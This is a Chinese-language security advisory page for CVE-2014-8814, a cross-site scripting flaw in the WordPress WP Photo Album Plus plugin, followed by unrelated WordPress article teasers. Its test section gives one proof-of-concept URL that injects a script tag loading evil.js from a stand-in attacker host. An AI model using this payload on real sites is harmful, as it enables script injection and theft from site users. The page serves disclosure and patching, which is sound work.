安科网

WordPress WP Photo Album Plus插件跨站脚本漏洞(CVE-2014-8814)

Xrapido

Xrapido

2014-11-26

关注 关注

发布日期:2014-11-24
更新日期:2014-11-26

受影响系统:
WordPress WP Photo Album Plus 5.4.17
描述:
BUGTRAQ  ID: 71263
 CVE(CAN) ID: CVE-2014-8814

 WP Photo Album Plus是管理和显示相册和幻灯片的插件。

WP Photo Album Plus插件在实现上存在跨站脚本漏洞,攻击者可利用此漏洞在受影响站点用户浏览器中执行任意脚本代码。

<*来源:Kacper Szurek
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/wp-admin/admin.php?page=wppa_photo_of_the_day&amp;amp;walbum=&quot;&amp;gt;&amp;lt;script src=http://attacker-url/evil.js&amp;gt;&amp;lt;/script&amp;gt;

建议:
厂商补丁:

WordPress
 ---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://wordpress.org/plugins/wp-photo-album-plus/

wordpress 漏洞 wp

Xrapido

Xrapido

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

WordPress 站点如何添加 Site Kit by Google 插件

Site Kit by Google 插件是一个 Google 针对 WordPress 提供的平台关联性产品。经过一段时间的使用,感觉还是非常方便的,这篇文章就是能够让我们手把手的添加这个插件到你的 WordPress 站点中。如果一切数据配置正确,这个

Wordpress0 2020-09-27

WordPress免插件实现面包屑导航的示例代码

你如果在开发自己的wordpress主题,想加入面包屑导航,而又不想使用插件的话,下面的代码对你有帮助,这里提供了网上较为流行的两种代码,一是功能非常完善的,一是一个较为简洁的代码。前面介绍了一种方法,你也可以尝试一下,在文末给大家详细介绍了自定义函数实现

bluehost 2020-09-15

wordpress忘记管理员密码

忘记管理员登录密码:网址:http://www.sanshu.cn/tools/modify_wordpress_password/输入网址重新登录http://ip/wp-admin

maccarty 2020-08-03

为WordPress所有的Tags标签添加Nofollow

Tags标签的使用和Nofollow的使用是SEO的重要技能,但有时候因为Tags链接太多,导致页面的权重被分散,这时候就要为Tags标签添加Nofollow,下面这些代码就可以轻松做到。只需要将以下代码复制到WordPress主题下面的funciton.

86520993 2020-07-28

Astra Pro主题永久正版授权wordpress轻量快速简洁主题模板汉化 后台110+模板

Astra Pro主题永久正版授权,后台官方模板随意导入更换,适合网站包括,中文企业站、自媒体、博客网站、英语外贸商城等!Astra在网站布局上是采取即时画面变更的编辑方式,在全网站设定颜色、文字大小、字体、汇整页面样式等都是在主题中自订选项完成,也就是可

WordPress 2020-07-04

服务器搭建自己的博客(ali版)《二》

WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把WordPress当作一个内容管理系统来使用。执行如下命令,安装PHP环境。yum -y install php php-mysq

李维山 2020-06-21

企业实战LNMP高性能服务器_wordpress、discuz双网站部署

LNMP WEB架构中,Nginx为一款高性能WEB服务器,本身是不能处理PHP的,当接收到客户端浏览器发送HTTP Request请求时,Nginx服务器响应并处理WEB请求,静态资源CSS、图片、视频、TXT等静态文件请求,Nginx服务器可以直接处理

GimmeS 2020-06-14

为wordpress的分类以及子分类指定固定模版

在wordpress主题开发有多个不同分类页面时,通常使用category-{slug}.php的方式分别为每个分类开发不同的页面模版,slug为该分类的别名,并且无需其他设置仅仅以此命名即可。但是,当分类下面有二级分类/三级分类时,这种做法就让二级分类/

WordPress 2020-06-10

怎样确保WordPress登录是安全的

确保其受到保护,以便只有授权用户才能登录。随着网络犯罪的增加,包括竞争对手在内的任何人都可能尝试***别人的网站。尽管WordPress平台本身提供了一系列安全功能,但仍然需要主动采取措施来确保登录页面的安全。主机侦探小编将提供有关WordPress网站登

shayuchaor 2020-06-10

实现LNMP架构,并部署WordPress以及配置NGINX虚拟主机

[ ~]# yum install php php-mysql ngnix mariadb-server php-fpm -y. [ nginx]# yum install gcc pcre-devel openssl-devel zlib-devel

liwf 2020-06-02

搭建博客

WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统来使用。WordPress官方支持中文版,同时有爱好者开发的第三方中文语言包,如wopus

疯狂老司机 2020-05-26

centos7 Pure-ftpd

VSFTP 有登录用户权限,上传用户所属问题下载并安装 Pure-ftpdyum 安装。##此时会出现为该ftp新用户创建密码的提示:。#创建用户信息数据库文件:。##查看用户列表:。##删除账号的命令为:。打开安全组防火墙 21端口 主被动模式都可以使用

zcl 2020-05-12

centos7搭建wordpress博客

ALTER USER ‘root‘@‘localhost‘ IDENTIFIED BY ‘NewPassWord1.‘;如果安装版本较低就会出现Your server is running PHP version 5.4.16 but WordPress

timewind 2020-05-11

Docker 搭建 WordPress 博客

docker run -d -p 8080:80 --name wordpress --link db.mysql:mysql wordpress

86520993 2020-05-04

一个奇怪的网页bug 竟然是局域网DNS搞的鬼

更新了网站服务器后,明明测试的时候用另一个IP可以正常浏览网站的slide show ,而且外网也可以正常浏览,偏偏用回旧IP的时候内网就是有不显示的问题。以为是wordpress 的问题,于是打开F12调试又查不到代码哪一行出错。删了那条记录就正常了[骷

Lophole 2020-04-29

wordpress +sakura主题 各种修改

注意备份数据文件。备案期间domin无法访问。所以不应该修改wordpressurl,站点url。建议修改当前主题的functions.php。修改之后登录后台发现设置里的地址已经修改为functions.php设置的地址了。update_option;

fraternityjava 2020-04-23

教程|阿里云+wordpress搭建个人博客网站

现在我就以快速搭建 WordPress 博客网站为例进行演示。WordPress 具有插件架构和模板系统,是目前因特网上最流行的博客系统,甚至是很多知名的网站官网均是使用 WordPress 进行搭建。

84911835 2020-04-16

如何为 wordpress 添加 ELB 并启用 https

我们有的时候会遇到这样的情况,我们的 wordpress 的服务器是提供 http 服务的,我们现在需要在前面添加一个负载均衡,配置用户和负载均衡之间使用 https 协议,负载均衡到 apache 之间使用 http 协议。如果我们这样设置的话,会导致一

maccarty 2020-04-09

wordpress不用插件实现批量替换文章内容中的旧地址

UPDATE `typecho_contents` SET `text` = REPLACE(`text`,‘旧域名地址‘,‘新域名地址‘);UPDATE `typecho_golinks` SET `target` = REPLACE(`target`,

WordPress 2020-04-07

搭建Wordpress博客

grant all on wordpress.* to ‘localhost‘ identified by ‘123456‘;设置参数:数据库名: wordpress用 户 名:wordpress密 码 :123456数据库主机:local

84911835 2020-03-23
Xrapido

Xrapido

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号